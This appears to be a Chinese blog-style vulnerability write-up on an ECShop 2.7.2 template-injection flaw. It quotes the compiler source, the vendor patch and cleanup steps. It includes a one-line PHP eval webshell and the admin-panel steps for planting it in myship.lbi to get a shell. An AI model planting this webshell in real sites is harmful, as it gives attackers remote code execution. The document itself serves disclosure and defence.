1. 漏洞描述2. 漏洞触发条件3. 漏洞影响范围4. 漏洞代码分析5. 防御方法6. 攻防思考

http://baike.baidu.com/view/399896.htm?fr=aladdinhttp://www.myhack58.com/Article/html/3/62/2010/27762.htm

模块管理 -> 库项目管理 -> 选择myship.lbi 配送方式 -> 插入<?php eval($_GET[‘op‘])?>

http://localhost/ecshop/myship.php

1. myship.php调用"\includes\cls_template.php"中的"make_compiled()"对模板"myship.lbi"进行编译、执行2. 被插入到"myship.lbi"中的PHP代码得到执行3. 编译后的静态模板文件被保存到"\temp\compiled\myship.lbi.php"中4. myship.php会包含(include)这个静态模板文件，被插入模板中的php代码得到执行5. getshell完成

ECShop_V2.7.2ECShop_V2.7.2 及以前版本

/*** 编译模板函数** @access  public* @param   string      $filename** @return  sring        编译后文件地址*/function make_compiled($filename){     //编译后的静态模板文件保存的路径    $name = $this->compile_dir . ‘/‘ . basename($filename) . ‘.php‘;    //判断缓存的静态模板文件是否过期    if ($this->_expires)    {        $expires = $this->_expires - $this->cache_lifetime;    }    else    {        $filestat = @stat($name);        $expires  = $filestat[‘mtime‘];    }    $filestat = @stat($filename);    if ($filestat[‘mtime‘] <= $expires && !$this->force_compile)    {        if (file_exists($name))        {        //引入编译后的静态模板文件        $source = $this->_require($name);        if ($source == ‘‘)        {            $expires = 0;        }        }        else        {        $source = ‘‘;        $expires = 0;        }    }    //对模板文件进行解析    if ($this->force_compile || $filestat[‘mtime‘] > $expires)    {        $this->_current_file = $filename;        $source = $this->fetch_str(file_get_contents($filename));         if (file_put_contents($name, $source, LOCK_EX) === false)        {        trigger_error(‘can\‘t write:‘ . $name);        }        $source = $this->_eval($source);    }     return $source;}

$source = $this->fetch_str(file_get_contents($filename));

/*** 处理字符串函数** @access  public* @param   string     $source** @return  sring*/function fetch_str($source){    if (!defined(‘ECS_ADMIN‘))    {        $source = $this->smarty_prefilter_preCompile($source);    }     //程序没有对即将解析的模板内容作任何的恶意检测    return preg_replace_callback("/{([^\}\{\n]*)}/", function($r) { return $this->select($r[1]); }, $source);}

http://bbs.ecshop.com/thread-1131753-1-1.html

/*** 处理字符串函数** @access  public* @param   string     $source** @return  sring*/function fetch_str($source){    if (!defined(‘ECS_ADMIN‘))    {        $source = $this->smarty_prefilter_preCompile($source);    }    //对即将解析的模板文件的内容进行了恶意代码检测，防止其中出现恶意的PHP代码    if(preg_match_all(‘~(<\?(?:\w+|=)?|\?>|language\s*=\s*[\"\‘]?php[\"\‘]?)~is‘, $source, $sp_match))    {        $sp_match[1] = array_unique($sp_match[1]);        for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)        {            $source = str_replace($sp_match[1][$curr_sp],‘%%%SMARTYSP‘.$curr_sp.‘%%%‘,$source);        }        for ($curr_sp = 0, $for_max2 = count($sp_match[1]); $curr_sp < $for_max2; $curr_sp++)        {            $source= str_replace(‘%%%SMARTYSP‘.$curr_sp.‘%%%‘, ‘<?php echo \‘‘.str_replace("‘", "\‘", $sp_match[1][$curr_sp]).‘\‘; ?>‘."\n", $source);        }    }    return preg_replace("/{([^\}\{\n]*)}/e", "\$this->select(‘\\1‘);", $source);}

1. 除了可以使黑客通过myship.php将恶意PHP代码写入磁盘文件中2. 同时恶意代码还会以静态缓存文件的形式在一定时间内保存在磁盘上，这个静态缓存文件中包含的恶意代码会在缓存有效期间一直有效

1. \temp\compiled\myship.lbi.php：由myship.lbi解析后生成2. \themes\default\library\myship.lbi

1. 对myship.lbi中的恶意代码进行清除：只能修改文件，不能删除文件2. 对myship.lbi.php的恶意文件进行删除：直接删除文件

1. code patch2. 对myship.lbi进行检测，如果发现有恶意PHP代码，则进行清除(修改文件)3. 对myship.lbi.php进行检测，如果发现有恶意PHP代码，则直接删除文件

http://www.cnblogs.com/LittleHann/p/3574694.html